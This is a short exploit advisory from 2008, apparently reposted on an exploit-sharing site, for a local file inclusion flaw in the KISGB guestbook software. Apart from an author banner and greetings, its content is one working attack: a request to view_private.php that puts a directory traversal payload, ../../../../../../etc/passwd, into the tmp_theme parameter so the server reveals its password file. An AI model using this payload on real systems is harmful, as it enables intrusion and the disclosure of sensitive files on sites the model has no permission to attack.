id: 2787
date: 03/30/2008
title: KISGB <= (tmp_theme) 5.1.1 Local File Inclusion Vulnerability
author: Cr@zy_King
cves: 

=============================================================
KISGB <= (tmp_theme) 5.1.1 Local File Inclusion Vulnerability
=============================================================



[~] KISGB (Keep It Simple Guest Book) : Local FiLe Include's (tmp_theme)
[~]
[~] Version : All Versions
[~] ----------------------------------------------------------
[~] Exploit coded and founded by Cr@zy_King
[~]
[~] Date: 30.03.2008
[~]
[~]
[~] -----------------------------------------------------------
[~] Greetz tO:-
[~]
[~] Digital-AngeLs Bug Researchers Yakinda OnLine :) Loading.
[~]
[~] [Peace Crew] Kerem125 - Alemin_Krali - m0sted - UyussMan
[~]
[~] Eno7 | Crackers_Child | Ghost61 | str0ke | [Hx] | [03xTr] | The_Bekir
[~]----------------------------------------------------------------------
[~] Exploit :-
[~]
[~] http://site.com/view_private.php?start=252&action=edit&tmp_theme=LFI
[~]
[~] ../../../../../../etc/passwd
[~]
[~]
[~]---------------------------------------------------------------------------------------------------------------



#  0day.today [2023-03-23]  #